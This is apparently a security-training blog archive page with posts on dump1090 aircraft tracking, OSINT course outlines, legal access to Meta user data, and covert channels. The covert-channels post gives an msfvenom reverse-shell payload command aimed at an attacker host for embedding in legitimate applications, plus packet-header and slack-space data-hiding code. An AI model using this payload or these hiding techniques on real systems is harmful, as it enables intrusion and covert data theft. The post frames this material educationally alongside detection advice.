OSINT – Page 2 – The CSI Linux Pro Shop

Posted on April 2, 2024September 25, 2024 by Jeremy Martin

Unlocking the Skies: A Layman’s Guide to Aircraft Tracking with Dump1090

Dive into the fascinating world of aircraft tracking with our comprehensive guide on Dump1090. Whether you're an aviation enthusiast, a professional in the field, or simply curious about the technology that powers real-time aircraft monitoring, this article has something for everyone. Starting with a layman-friendly introduction to the invisible network of communication between aircraft and radar systems, we gradually transition into the more technical aspects of Dump1090, Software Defined Radio (SDR), and the significance of the 1090 MHz frequency. Learn how Dump1090 transforms raw Mode S data into accessible information, providing a window into the complex ballet of aircraft as they navigate the skies. Plus, discover the practical uses of this powerful tool, from tracking flights in real-time to conducting in-depth air traffic analysis. Join us as we unlock the secrets of the skies, making the invisible world of aviation radar data comprehensible and engaging for all.

In an age where the sky above us is crisscrossed by countless aircraft, each completing its journey from one corner of the world to another, there lies an invisible network of communication. This network, primarily composed of signals invisible to the naked eye, plays a critical role in ensuring the safety and efficiency of air travel. At the heart of this network is something known as Mode S, a sophisticated radar system used by aviation authorities worldwide to keep track of aircraft in real-time. But what if this complex data could be translated into something more accessible, something that could be understood by anyone from aviation enthusiasts to professionals in the field? Enter dump1090, a simple yet powerful command-line utility designed to demystify the world of aviation radar.

Imagine having the ability to see the invisible, to decode the silent conversations between aircraft and radar systems. With dump1090, this isn’t just a possibility—it’s a reality. By transforming raw Mode S data into a user-friendly format, dump1090 offers a window into the intricate ballet of aircraft as they navigate the skies. Whether you’re a pilot monitoring nearby traffic, an aviation enthusiast tracking flights from your backyard, or a professional analyzing air traffic patterns, dump1090 serves as your personal radar display, translating complex signals into clear, understandable information.

From displaying real-time data about nearby aircraft to generating detailed reports on air traffic patterns, dump1090 is more than just a tool—it’s a bridge connecting us to the otherwise invisible world of air travel. Its applications range from casual observation for hobbyists to critical data analysis for industry experts, making it a versatile companion for anyone fascinated by the dynamics of flight.

As we prepare to delve deeper into the technicalities of how dump1090 operates and the myriad ways it can be employed, let us appreciate the technology’s power to unlock the secrets of the skies. By decoding and displaying aviation radar data, dump1090 not only enhances our understanding of air travel but also brings the complex choreography of aircraft movements into sharper focus.

Transitioning to the Technical Section

Now that we’ve explored the fascinating world dump1090 opens up to us, let’s transition into the technical mechanics of how this utility works. From installation nuances to command-line flags and parameters that unleash its full potential, the following section will guide enthusiasts and professionals alike through the nuts and bolts of leveraging dump1090 to its maximum capacity. Whether your interest lies in enhancing personal knowledge or applying this tool in a professional aviation environment, understanding the technical underpinnings of dump1090 will empower you to tap into the rich stream of data flowing through the airwaves around us.

What is Dump1090?

Dump1090 or dump1090-mutability is a sophisticated, command-line-based software program specifically designed for Software Defined Radio (SDR) receivers that capture aircraft signal data. Operating primarily on the 1090 MHz frequency band, which is reserved for aviation use, dump1090 decodes the radio signals transmitted by aircraft transponders. These signals, part of the Mode S specification, contain a wealth of information about each plane in the vicinity, including its identity, position, altitude, and velocity.

Understanding Software Defined Radio (SDR)

At the core of dump1090’s functionality is the concept of Software Defined Radio (SDR). Unlike traditional radios, which use hardware components (such as mixers, filters, amplifiers, modulators/demodulators) to receive and transmit signals, SDR accomplishes these tasks through software. An SDR device allows users to receive a wide range of frequencies, including those used by aircraft transponders, by performing signal processing in software. This flexibility makes SDR an ideal platform for applications like dump1090, where capturing and decoding specific radio signals is required.

dump1090-mutability receives and decodes Mode S packets using the Realtek RTL2832 software-defined radio interface

The Significance of 1090 MHz

The 1090 MHz frequency is internationally allocated for aeronautical secondary surveillance radar transponder signals, specifically for the Mode S and Automatic Dependent Surveillance-Broadcast (ADS-B) technologies. Mode S (Selective) transponders provide air traffic controllers with a unique identification code for each aircraft, along with altitude information, while ADS-B extends this by broadcasting precise GPS-based position data. Dump1090 primarily listens to this frequency to capture the ADS-B transmissions that are openly broadcasted by most modern aircraft.

Captured Information by Dump1090

Utilizing an SDR device tuned to 1090 MHz, dump1090 can capture and decode a variety of information broadcasted by aircraft, including:

- ICAO Aircraft Address: A unique 24-bit identifier assigned to each aircraft, used for identification in all ADS-B messages.
- Flight Number: The flight identifier or call sign used for ATC communication.
- Position (Latitude and Longitude): The geographic location of the aircraft, derived from its onboard GPS.
- Altitude: The current flying altitude of the aircraft, usually in feet above mean sea level.
- Velocity: The speed and direction of the aircraft’s motion.
- Vertical Rate: The rate at which an aircraft is climbing or descending, typically in feet per minute.
- Squawk Code: A four-digit code set by the pilot to communicate with air traffic control about the aircraft’s current status or mission.

Practical Use Cases

The real-time data captured by dump1090 is invaluable for a variety of practical applications:

- Aviation Enthusiasts: Track flights and observe air traffic patterns in real-time.
- Pilots and Air Traffic Controllers: Gain additional situational awareness of nearby aircraft.
- Security and Surveillance: Monitor airspace for unauthorized or suspicious aircraft activity.
- Research and Analysis: Collect data for studies on air traffic flows, congestion, and optimization of flight paths.

By combining dump1090 with an SDR device, users can access a live feed of the skies above them, turning a simple computer setup into a powerful aviation tracking station. This blend of technology offers a unique window into the otherwise invisible world of aerial communication, showcasing the power of modern radio and decoding technologies to unlock the secrets held in the 1090 MHz airwaves.

Let the Fun Begin

To dive into practical applications and understand how to use dump1090 to decode and display aircraft data from Mode S transponders, we’ll explore some common syntax used to run dump1090 and discuss the type of output you can expect. Let’s break down the steps to set up your environment for capturing live ADS-B transmissions and interpreting the data.

Basic Usage:

To start dump1090 and display aircraft data in your terminal, you can use:

dump1090 --interactive

This command runs dump1090 in interactive mode, which is designed for terminal use and provides a real-time text display of detected aircraft and their information.

Common Syntax

Now let’s walk through the basics of how to use this ADS-B receiver and decoder.

- Quiet Mode:

dump1090 --quiet

This command runs dump1090 without printing detailed message output, reducing terminal clutter.

- Enable Network Mode:

dump1090 --net

This enables built-in webserver and network services, allowing you to view aircraft data in a web browser at http://localhost:8080.

- Raw Output Mode:

dump1090 --raw

Useful for debugging or processing raw Mode S messages with external tools.

- Specify the SDR Device:

If you have multiple SDR devices connected:

dump1090 --device-index 0

This specifies which SDR device to use by index.

Expected Output

When running dump1090, especially in interactive mode, you can expect to see a continuously updating table that includes columns such as:

- Hex: The aircraft’s ICAO address in hexadecimal.
- Flight: The flight number or call sign.
- Altitude: Current altitude in feet.
- Speed: Ground speed in knots.
- Lat/Lon: Latitude and longitude of the aircraft.
- Track: The direction the aircraft is facing, in degrees.
- Messages: The number of Mode S messages received from this aircraft.
- Seen: Time since the last message was received from the aircraft.

Here’s a simplified example of what the output might look like:

Hex    Flight  Altitude  Speed   Lat     Lon      Track  Messages  Seen
A1B2C3  ABC123  33000    400   40.1234   -74.1234  180   200      1 sec
D4E5F6  DEF456  28000    380   41.5678   -75.5678  135   150      2 sec

This display provides a real-time overview of aircraft in the vicinity of your SDR receiver, including their positions, altitudes, and flight numbers.

Using multiple Software Defined Radios (SDRs) in conjunction with dump1090 can significantly enhance the tracking and monitoring capabilities of aircraft by employing a technique known as multilateration (MLAT). Multilateration allows for the accurate triangulation of an aircraft’s position by measuring the time difference of arrival (TDOA) of a signal to multiple receiver stations. This method is particularly useful for tracking aircraft that do not broadcast their GPS location via ADS-B or for augmenting the precision of location data in areas with dense aircraft traffic.

Enhancing Your Radar: Advanced Techniques with Dump1090

Beyond the basics of using Dump1090 to monitor air traffic through Mode S signals, some advanced features and techniques can further expand your radar capabilities. From improving message decoding to leveraging network support for broader data analysis, Dump1090 offers a range of functionalities designed for aviation enthusiasts and professionals alike. Here, we’ll explore these advanced options, providing syntax examples and insights into how they can enhance your aircraft tracking endeavors.

Advanced Decoding and Network Features

Robust Decoding of Weak Messages: Dump1090 is known for its ability to decode weak messages more effectively than other decoders. This enhanced sensitivity can extend the range of your SDR, allowing you to detect aircraft that are further away or those with weaker transponder signals.

Network Support for Expanded Data Analysis: With built-in network capabilities, Dump1090 can stream decoded messages over TCP, provide raw packet data, and even host an embedded HTTP server. This allows for real-time display of detected aircraft on Google Maps, offering a visual representation of air traffic in your vicinity.

- TCP Stream: For real-time message streaming, use the --net flag:
  ./dump1090 --net
  Connect to http://localhost:8080 to access the embedded web server and view aircraft positions on a map.
- Single Bit Error Correction: Utilizing the 24-bit CRC, Dump1090 can correct single-bit errors, enhancing the reliability of the decoded messages. This feature is automatically enabled but can be disabled for pure data analysis purposes using the --no-fix option.
- Decoding Diverse DF Formats: Dump1090 can decode a variety of Downlink Formats (DF), including DF0, DF4, DF5, DF16, DF20, and DF21, by brute-forcing the checksum field with recently seen ICAO addresses. This broadens the scope of data captured, offering more comprehensive insights into aircraft movements.

Syntax for Advanced Usage

Using Files as a Data Source: For situations where live SDR data is unavailable, Dump1090 can decode data from prerecorded binary files:

./dump1090 --ifile /path/to/your/file.bin

Generate compatible binary files using rtl_sdr:

rtl_sdr -f 1090000000 -s 2000000 -g 50 - | gzip > yourfile.bin.gz

Interactive Mode with Networking: To engage interactive mode with networking, enabling access to the web interface:

./dump1090 --interactive --net

Aggressive Mode for Enhanced Detection: Activate aggressive mode with --aggressive to employ more CPU-intensive methods for detecting additional messages:

./dump1090 --aggressive

This mode is beneficial in low-traffic areas where capturing every possible message is paramount.

Network Server Capabilities

- Port 30002 for Real-Time Data Streaming: Clients connected to this port receive data as it arrives, in a raw format suitable for further processing.
- Port 30001 for Raw Input: This port accepts raw Mode S messages, allowing Dump1090 to function as a central hub for data collected from multiple sources.
  Combine data from remote Dump1090 instances:
  nc remote-dump1090.example.net 30002 | nc localhost 30001
- Port 30003 for SBS1 Format: Ideal for feeding data into flight tracking networks, this port outputs messages in the BaseStation format.

Building Your Own Radar Network

By strategically deploying multiple SDRs equipped with Dump1090 and utilizing the software’s network capabilities, you can create a comprehensive radar network. This setup not only enhances coverage area but also improves the accuracy of aircraft positioning through techniques like multilateration.

How Multilateration Works

Multilateration for aircraft tracking works by utilizing the fact that radio signals travel at a constant speed (the speed of light). By measuring precisely when a signal from an aircraft’s transponder is received at multiple ground-based SDRs, and knowing the exact locations of those receivers, it’s possible to calculate the source of the signal — the aircraft’s position.

The process involves the following steps:

- Signal Reception: Multiple ground stations equipped with SDRs receive a signal transmitted by an aircraft.
- Time Difference Calculation: Each station notes the exact time the signal was received. The difference in reception times among the stations is calculated, given the signal’s travel time varies due to the different distances to each receiver.
- Position Calculation: Using the time differences and the known locations of the receivers, the position of the aircraft is calculated through triangulation, determining where the signal originated from within three-dimensional space.

Setting Up Multiple SDRs for MLAT

To utilize MLAT, you’ll need several SDRs set up at different, known locations. Each SDR needs to be connected to a computer or a device capable of running dump1090 or similar software. The software should be configured to send the raw Mode S messages along with precise timestamps to a central server capable of performing the MLAT calculations.

Configuring Dump1090 for MLAT

- Install and Run Dump1090: Ensure dump1090 is installed and running on each device connected to an SDR, as described in previous sections.
- Synchronize Clocks: Precise timekeeping is crucial for MLAT. Ensure that the clocks on the devices running dump1090 are synchronized, typically using NTP (Network Time Protocol).
- Central MLAT Server: You will need a central server that receives data from all your dump1090 instances. This server will perform the MLAT calculations. You can use existing MLAT server software packages, such as those provided by flight tracking networks like FlightAware, or set up your own if you have the technical expertise.
- Configure Network Settings: Each instance of dump1090 must be configured to forward the received Mode S messages to your MLAT server. This is often done through command-line flags or configuration files specifying the server’s IP address and port.

MLAT Server Configuration

Configuring an MLAT server involves setting up the software to receive data from your receivers, perform the TDOA calculations, and optionally, output the results to a map or data feed. This setup requires detailed knowledge of network configurations and potentially custom software development, as the specifics can vary widely depending on the chosen solution.

Example Configuration

An example configuration for forwarding data from dump1090 to an MLAT server is not universally applicable due to the variety of software and network setups possible. However, most configurations will involve specifying the MLAT server’s address and port in the dump1090 or receiver software settings, often along with authentication details if required.

While setting up an MLAT system with multiple SDRs for aircraft tracking is more complex and requires additional infrastructure compared to using a single SDR for ADS-B tracking, the payoff is the ability to accurately track a wider range of aircraft, including those not broadcasting their position. Successfully implementing such a system can provide invaluable data for aviation enthusiasts, researchers, and professionals needing detailed situational awareness of the skies.

Tips for Successful Monitoring

- Ensure your SDR antenna is properly positioned for optimal signal reception; higher locations with clear line-of-sight to the sky tend to work best.
- Consider running dump1090 on a dedicated device like a Raspberry Pi to enable continuous monitoring.
- Explore dump1090’s web interface for a graphical view of aircraft positions on a map, which provides a more intuitive way to visualize the data.

Through these commands and output expectations, users can effectively utilize dump1090 to monitor and analyze ADS-B transmissions, turning complex radar signals into accessible and actionable aviation insights.

Posted on March 25, 2024September 25, 2024 by csilinux

The CSI Linux Certified OSINT Analyst (CSIL-COA)

Course: CSI Linux Certified OSINT Analyst | CSI Linux Academy

Embark on a thrilling journey into the heart of digital sleuthing with the CSI Linux Certified-OSINT Analyst (CSIL-COA) program. In today’s world, where the internet is the grand tapestry of human knowledge and secrets, the ability to sift through this vast digital expanse is crucial for uncovering the truth. Whether it’s a faint digital whisper or a conspicuous online anomaly, every clue has a story to tell, often before traditional evidence comes to light. The CSIL-COA is your gateway to mastering the art and science of open-source intelligence, transforming scattered online breadcrumbs into a roadmap of actionable insights.

With the CSIL-COA certification, you’re not just learning to navigate the digital realm; you’re mastering it. This course is a deep dive into the core of online investigations, blending time-honored investigative techniques with the prowess of modern Open-Source Intelligence (OSINT) methodologies. From the initial steps of gathering information to the preservation of digital footprints and leveraging artificial intelligence to unravel complex data puzzles, this program covers it all. By the end of this transformative journey, you’ll emerge as a skilled digital detective, equipped with the knowledge and tools to lead your investigations with accuracy and innovation. Step into the role of an OSINT expert with us and expand your investigative landscape.

Here’s a glimpse of what awaits you in each segment of the OSINT certification and training material:

Who is CSIL-CI For?

- Law Enforcement
- Intelligence Personnel
- Private Investigators
- Insurance Investigators
- Cyber Incident Responders
- Digital Forensics (DFIR) analysts
- Penetration Testers
- Social Engineers
- Recruiters
- Human Resources Personnel
- Researchers
- Investigative Journalists

CSIL-COA Course Outline

- What is OSINT?
- Unraveling the Intricacies of Digital Forensics
- Preserving Online Evidence
- Phone Numbers and Info
- IP Addresses, Proxies, and VPNs
- DNS, Domains, and Subdomains
- Importance of Anonymity
- Examples of Online Investigation
- Misinformation, Disinformation, and Deception

Crafting Your Digital Disguise: The Art of Persona (Sock Puppet) Creation
Using your persona to investigate
Translation options
Website Collection
3rd Party Commercial Apps
OSINT Frameworks (tools)
Tracking changes and getting alerts
Public Records Searches
Geolocation
Tracking Transportation

The Storytelling Power of Images
Social Media Sites
Video Evidence Collection
Cryptocurrency
AI Challenges
Reporting and Actionable Intelligence
OSINT Case Studies
Practicing OSINT and Resources
Course Completion
The CSIL-COA Exam

The CSIL-CI Exam details

Exam Format:

- Online testing
- 85 questions (Multiple Choice)
- 2 hours
- A minimum passing score of 85%
- Cost: $385

Domain Weight

- OPSEC (%13)
- Technology and Online Basics (%20)
- Laws, Ethics, and Investigations (%9)
- Identification (%16)
- Collection & Preservation (%13)
- Examination & Analysis (%13)
- Presentation & Reporting (%14)

Certification Validity and Retest:

The certification is valid for three years. To receive a free retest voucher within this period, you must either:
- - Submit a paper related to the subject you were certified in, ensuring it aligns with the course material.
  - Provide a walkthrough on a tool not addressed in the original course but can be a valuable supplement to the content.
This fosters continuous learning and allows for enriching the community and the field. Doing this underscores your commitment to staying updated in the industry. If you don’t adhere to these requirements and fail to recertify within the 3-year timeframe, your certification will expire.

Interactive Content

[h5p id=”7″]

Resource

Course: CSI Linux Certified OSINT Analyst | CSI Linux Academy

Posted on March 23, 2024September 25, 2024 by Jeremy Martin

Shadows and Signals: Unveiling the Hidden World of Covert Channels in Cybersecurity

A covert channel is a type of communication method which allows for the transfer of data by exploiting resources that are commonly available on a computer system. Covert channels are types of communication that are invisible to the eyes of the system administrators or other authorized users. Covert channels are within a computer or network system, but are not legitimate or sanctioned forms of communication. They may be used to transfer data in a clandestine fashion.

One term that often pops up in the realm of digital sleuthing is “covert channels.” Imagine for a moment, two secret agents communicating in a room full of people, yet no one else is aware of their silent conversation. This is akin to what happens in the digital world with covert channels – secretive pathways that allow data to move stealthily across a computer system, undetected by those who might be monitoring for usual signs of data transfer.

Covert channels are akin to hidden passageways within a computer or network, not intended or recognized for communication by the system’s overseers. These channels take advantage of normal system functions in creative ways to sneak data from one place to another without raising alarms. For example, data might be cleverly embedded within the mundane headers of network packets, a practice akin to hiding a secret note in the margin of a public document. Or imagine a scenario where a spy hides their messages within the normal communications of a legitimate app, sending out secrets alongside everyday data.

Other times, covert channels can be more about timing than hiding data in plain sight. By altering the timing of certain actions or transmissions, secret messages can be encoded in what seems like normal system behavior. There are also more direct methods, like covert storage channels, where data is tucked away in the nooks and crannies of a computer’s memory or disk space, hidden from prying eyes.

Then there’s the art of data diddling – tweaking data ever so slightly to carry a hidden message or malicious code. And let’s not forget steganography, the age-old practice of hiding messages within images, audio files, or any other type of media, updated for the digital age.

While the term “covert channels” might conjure images of cyber villains and underhanded tactics, it’s worth noting that these secretive pathways aren’t solely the domain of wrongdoers. They can also be harnessed for good, offering a way to secure communications by encrypting them in such a way that they blend into the digital background noise.

On a more technical note, a covert channel is a type of communication method that allows for the transfer of data by exploiting resources that are commonly available on a computer system. Covert channels are types of communication that are invisible to the eyes of the system administrators or other authorized users. Covert channels are within a computer or network system but are not legitimate or sanctioned forms of communication. They may be used to transfer data in a clandestine fashion.

Examples of covert channels include:

- Embedding data in the headers of packets – The covert data is embedded in the headers of normal packets and sent over a protocol related to the normal activities of the computer system in question.
- Data piggybacked on applications – Malicious applications are piggybacked with legitimate applications used on the computer system, sending confidential data.
- Time-based channel – The timing of certain actions or transmissions is used to encode data.
- Covert storage channel – Data is stored within a computer system on disk or in memory and is hidden from the system’s administrators.
- Data diddling – This involves manipulating data to contain malicious code or messages.
- Steganography – This is a process of hiding messages within other types of media such as images and audio files.

Covert channels are commonly used for malicious purposes, such as the transmission of sensitive data or the execution of malicious code on a computer system. They can also be used for legitimate purposes, however, such as creating an encrypted communication channel.

Let’s talk a little more about how this is done with a few of the methods…

Embedding data in the headers of packets

Embedding data in the headers of network packets represents a sophisticated method for establishing covert channels in a networked environment. This technique leverages the unused or reserved bits in protocol headers, such as TCP, IP, or even DNS, to discreetly transmit data. These channels can be incredibly stealthy, making them challenging to detect without deep packet inspection or anomaly detection systems in place. Here’s a detailed look into how it’s accomplished and the tools that can facilitate such actions.

Technical Overview

Protocol headers are structured with predefined fields, some of which are often unused or set aside for future use (reserved bits). By embedding information within these fields, it’s possible to bypass standard monitoring tools that typically inspect packet payloads rather than header values.

IP Header Manipulation

An IP header, for instance, has several fields where data could be covertly inserted, such as the Identification field, Flags, Fragment Offset, or even the TOS (Type of Service) fields.

Example using Scapy in Python:

from scapy.all import * # Define the destination IP address and the port number dest_ip = "192.168.1.1" dest_port = 80 # Craft the packet with covert data in the IP Identification field packet = IP(dst=dest_ip, id 1337)/TCP(dport=dest_port)/"Covert message here" # Send the packet send(packet)

In this example, 1337 is the covert data embedded in the id field of the IP header. The packet is then sent to the destination IP and port specified. This is a simplistic representation, and in practice, the covert data would likely be more subtly encoded.

TCP Header Manipulation

Similarly, the TCP header has fields like the Sequence Number or Acknowledgment Number that can be exploited to carry hidden information.

Example using Hping3 (a command-line packet crafting tool):

hping3 -S 192.168.1.1 -p 80 --tcp-timestamp -d 120 -E file_with_covert_data.txt -c 1

This command sends a SYN packet to 192.168.1.1 on port 80, embedding the content of file_with_covert_data.txt within the packet. The -d 120 specifies the size of the packet, and -c 1 indicates that only one packet should be sent. Hping3 allows for the customization of various TCP/IP headers, making it suitable for covert channel exploitation.

Tools and Syntax for Covert Communication

- Scapy: A powerful Python-based tool for packet crafting and manipulation.
  - The syntax for embedding data into an IP header has been illustrated above with Scapy.
- Hping3: A command-line network tool that can send custom TCP/IP packets.
  - The example provided demonstrates embedding data into a packet using Hping3.

Detection and Mitigation

Detecting such covert channels involves analyzing packet headers for anomalies or inconsistencies with expected protocol behavior. Intrusion Detection Systems (IDS) and Deep Packet Inspection (DPI) tools can be configured to flag unusual patterns in these header fields.

Silent Infiltrators: Piggybacking Malicious Code on Legitimate Applications

The technique of piggybacking data on applications involves embedding malicious code within legitimate software applications. This method is a sophisticated way to establish a covert channel, allowing attackers to exfiltrate sensitive information from a compromised system discreetly. The malicious code is designed to execute its payload without disrupting the normal functionality of the host application, making detection by the user or antivirus software more challenging.

Technical Overview

Piggybacking often involves modifying an application’s binary or script files to include additional, unauthorized code. This code can perform a range of actions, from capturing keystrokes and collecting system information to exfiltrating data through network connections. The key to successful piggybacking is ensuring that the added malicious functionality remains undetected and does not impair the application’s intended operation.

Embedding Malicious Code

- Binary Injection: Injecting code directly into the binary executable of an application. This requires understanding the application’s binary structure and finding suitable injection points that don’t disrupt its operation.
- Script Modification: Altering script files or embedding scripts within applications that support scripting (e.g., office applications). This can be as simple as adding a macro to a Word document or modifying JavaScript within a web application.

Tools and Syntax

- Metasploit: A framework that allows for the creation and execution of exploit code against a remote target machine. It includes tools for creating malicious payloads that can be embedded into applications.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > malicious.exe

This command generates an executable payload (malicious.exe) that, when executed, opens a reverse TCP connection to the attacker’s IP (attacker_ip) on port 4444. This payload can be embedded into a legitimate application.

- Resource Hacker: A tool for viewing, modifying, adding, and deleting the embedded resources within executable files. It can be used to insert malicious payloads into legitimate applications without affecting their functionality.

Syntax: The usage of Resource Hacker is GUI-based, but it involves opening the legitimate application within the tool, adding or modifying resources (such as binary files, icons, or code snippets), and saving the modified application.

Detection and Mitigation

Detecting piggybacked applications typically involves analyzing changes to application binaries or scripts, monitoring for unusual application behaviors, and employing antivirus or endpoint detection and response (EDR) tools that can identify known malicious patterns.

Mitigation strategies include:

- Application Whitelisting: Only allowing pre-approved applications to run on systems, which can prevent unauthorized modifications or unknown applications from executing.
- Code Signing: Using digital signatures to verify the integrity and origin of applications. Modified applications will fail signature checks, alerting users or systems to the tampering.
- Regular Auditing and Monitoring: Regularly auditing applications for unauthorized modifications and monitoring application behaviors for signs of malicious activity.

Piggybacking data on applications requires a nuanced approach, blending malicious intent with technical sophistication to evade detection. By embedding malicious code within trusted applications, attackers can create a covert channel for data exfiltration, making it imperative for cybersecurity defenses to employ multi-layered strategies to detect and mitigate such threats.

As a cyber investigator, understanding the ins and outs of covert channels is crucial. They represent both a challenge and an opportunity – a puzzle to solve in the quest to secure our digital environments, and a tool that, when used ethically, can protect sensitive information from those who shouldn’t see it. Whether for unraveling the schemes of cyber adversaries or safeguarding precious data, the study of covert channels is a fascinating and essential aspect of modern cybersecurity.

Hiding Data in Slack Space

To delve deeper into the concept of utilizing disk slack space for covert storage, let’s explore not only how to embed data within this unused space but also how one can retrieve it later. Disk slack space, as previously mentioned, is the residual space in a disk’s cluster that remains after a file’s content doesn’t fill the allocated cluster(s). This underutilized space presents an opportunity for hiding data relatively undetected.

Detailed Writing to Slack Space

When using dd in Linux to write data to slack space, precision is key. The example provided demonstrates embedding a “hidden message” at the end of an existing file without altering its visible content. This method leverages the stat command to determine the file size, which indirectly helps locate the start of the slack space. The dd command then appends data directly into this slack space.

then either warns the user if the hidden message is too large or proceeds to embed the message into the slack space of the file.

#!/bin/bash

# Define the file and hidden message

file="example.txt"

hidden_message="your hidden message here"

mount_point="/mount/point" # Change this to your actual mount point



# Determine the cluster size in bytes

cluster_size=$(stat -f --format="%S" "$mount_point")



# Determine the actual file size in bytes and calculate available slack 
space
file_size=$(stat --format="%s" "$file")

occupation_of_last_cluster=$(($file_size % $cluster_size))

available_slack_space=$(($cluster_size - $occupation_of_last_cluster))



# Define the hidden message size

hidden_message_size=${#hidden_message}



# Check if the hidden message fits within the available slack space

if [ $hidden_message_size -gt $available_slack_space ]; then

    echo "Warning: The hidden message exceeds the available slack space."

else

    
# Embed the hidden message into the slack space

    echo -n "$hidden_message" | dd of="$file" bs=1 seek=$file_size conv=notrunc
    echo "Message embedded successfully."

fi

Retrieving Data from Slack Space

Retrieving data from Slack space involves knowing the exact location and size of the hidden data. This can be complex, as slack space does not have a standard indexing system or table that points to the hidden data’s location. Here’s a conceptual method to retrieve the hidden data, assuming the size of the hidden message and its offset are known:

# Define variables for the offset and size of the hidden data

hidden_data_offset="size_of_original_content"

hidden_data_size="length_of_hidden_message"


# Use 'dd' to extract the hidden data

dd if="$file" bs=1 skip="$hidden_data_offset" count="$hidden_data_size" 2>/dev/null

In this command, skip is used to bypass the original content of the file and position the reading process at the beginning of the hidden data. count specifies the amount of data to read, which should match the size of the hidden message.

Tools and Considerations for Slack Space Operations

- Automation Scripts: Custom scripts can automate the process of embedding and extracting data from Slack space. These scripts could calculate the size of the file’s content, determine the appropriate offsets, and perform the data embedding or extraction automatically.
- Security and Privacy: Manipulating slack space for storing data covertly raises significant security and privacy concerns. It’s crucial to understand the legal and ethical implications of such actions. This technique should only be employed within the bounds of the law and for legitimate purposes, such as research or authorized security testing.

Understanding and manipulating slack space for data storage requires a thorough grasp of file system structures and the underlying physical storage mechanisms. While the Linux dd command offers a straightforward means to write to and read from specific disk offsets, effectively leveraging slack space for covert storage also demands meticulous planning and operational security to ensure the data remains concealed and retrievable only by the intended parties.

Resources

CSI Linux Certified Covert Comms Specialist (CSIL-C3S) | CSI Linux Academy
CSI Linux Certified Computer Forensic Investigator | CSI Linux Academy

Posted on March 20, 2024September 25, 2024 by Jeremy Martin

The CSI Linux Certified Investigator (CSIL-CI)

Course: CSI Linux Certified Investigator | CSI Linux Academy

Ever wondered what sets CSI Linux apart in the crowded field of cybersecurity? Now’s your chance to not only find out but to master it — on us! CSI Linux isn’t just another distro; it’s a game-changer for cyber sleuths navigating the digital age’s complexities. Dive into the heart of cyber investigations with the CSI Linux Certified Investigator (CSIL-CI) certification, a unique blend of knowledge, skills, and the right tools at your fingertips.

Embark on a Cybersecurity Adventure with CSIL-CI

Transform your cybersecurity journey with the CSIL-CI course. It’s not just a certification; it’s your all-access pass to the inner workings of CSI Linux, tailored for the modern investigator. Delve into the platform’s cutting-edge features and discover a suite of custom tools designed with one goal in mind: to crack the case, whatever it may be.

Your Skills, Supercharged

The CSIL-CI course is your curated pathway through the labyrinth of CSI Linux. Navigate through critical areas such as Case Management, Online Investigations, and the art of Computer Forensics. Get hands-on with tackling Malware Analysis, cracking Encryption, and demystifying the Dark Web — all within the robust framework of CSI Linux.

Don’t just take our word for it. Experience firsthand how CSI Linux redefines cyber investigations. Elevate your investigative skills, broaden your cybersecurity knowledge, and become a part of an elite group of professionals with the CSIL-CI certification. Your journey into the depths of cyber investigations starts here.

Who is CSIL-CI For?

- Law Enforcement
- Intelligence Personnel
- Private Investigators
- Insurance Investigators
- Cyber Incident Responders
- Digital Forensics (DFIR) analysts
- Penetration Testers
- Social Engineers
- Recruiters
- Human Resources Personnel
- Researchers
- Investigative Journalists

CI Course Outline

- Downloading and installing CSI Linux
- Setting up CSI Linux
- Troubleshooting
- System Settings
- The Case Management System
- Case Management Report Templates
- Importance of Anonymity
- Communications Tools

- Connecting to the Dark Web
- Malware Analysis
- Website Collection
- Online Video Collection
- Geolocation
- Computer Forensics
- 3rd Party Commercial Apps
- Data Recovery

- Incident Response
- Memory Forensics
- Encryption and Data Hiding
- SIGINT, SDR, and Wireless
- Threat Intelligence
- Threat Hunting
- Promoting the Tradecraft
- The Exam

The CSIL-CI Exam details

Exam Format:

- Online testing
- 85 questions (Multiple Choice)
- 2 hours
- A minimum passing score of 85%
- Cost: FREE

Domain Weight

- CSI Linux Fundamentals (%20)
- System Configuration & Troubleshooting (%15)
- Basic Investigative Tools in CSI Linux (%18)
- Case Management & Reporting (%14)
- Case Management & Reporting (%14)
- Encryption & Data Protection (%10)
- Further Analysis & Advanced Features (%7)

Interactive Content

[h5p id=”4″]

Certification Validity and Retest:

The certification is valid for three years. To receive a free retest voucher within this period, you must either:

- Submit a paper related to the subject you were certified in, ensuring it aligns with the course material.
- Provide a walkthrough on a tool not addressed in the original course but can be a valuable supplement to the content.

This fosters continuous learning and allows for enriching the community and the field. Doing this underscores your commitment to staying updated in the industry. If you don’t adhere to these requirements and fail to recertify within the 3-year timeframe, your certification will expire.

Resource

Course: CSI Linux Certified Investigator | CSI Linux Academy

Posted on March 19, 2024September 25, 2024 by Jeremy Martin

A Simplified Guide to Accessing Facebook and Instagram Data for Law Enforcement and Investigators

In the realm of law enforcement and investigations, understanding how to legally access data from platforms like Facebook and Instagram is crucial. Given the non-technical backgrounds of many in this field, it’s essential to break down the process into understandable terms. Here’s a straightforward look at what kinds of data can be accessed, the legal pathways to obtain it, and its importance for investigations, all without the technical jargon.

The Types of Data Available

When conducting investigations, the data from social media platforms can be a goldmine of information. Here’s what can typically be accessed with legal authority:

- Personal Details: Names, birth dates, contact information—all the basics that users provide when setting up their profiles.

- Location History: If users have location settings enabled, you can see where they’ve been checking in or posting from.

- Communications: Information on who users have been messaging, when, and sometimes, depending on the legal documentation, the content of those messages.

- Online Activities: Logs of when users were active, the devices they used, and their internet addresses.

- Photos and Videos: Visual content posted by the user can often be retrieved.

- Financial Transactions: Records of any purchases made through these platforms.

Legal Requirements for Data Access

Accessing user data isn’t as simple as asking for it; there are specific legal channels that must be followed:

- Emergency Situations: In cases where there’s an immediate risk to someone’s safety, platforms can provide information more rapidly to help prevent harm.

- Court Orders and Search Warrants: For most investigation purposes, authorities need to obtain either a court order or a more specific search warrant, explaining why the information is necessary for the investigation.

Why It Matters

For law enforcement and investigators, accessing this data can be critical for:

- Solving Crimes: Digital evidence can provide leads that aren’t available elsewhere.

- Finding Missing Persons: Location data and communication logs can offer clues to a person’s last known whereabouts.

- Supporting Legal Cases: Evidence gathered from these platforms can be used in court to support legal arguments.

Privacy and Legal Compliance

It’s important to remember that these platforms have strict policies and legal obligations to protect users’ privacy. They only release data in compliance with the law and often report on how often and why they’ve shared data with law enforcement. This transparency is key to maintaining user trust while supporting legal and investigative processes.

Meta Platforms, Inc.
1 Meta Way
Menlo Park, CA 94025

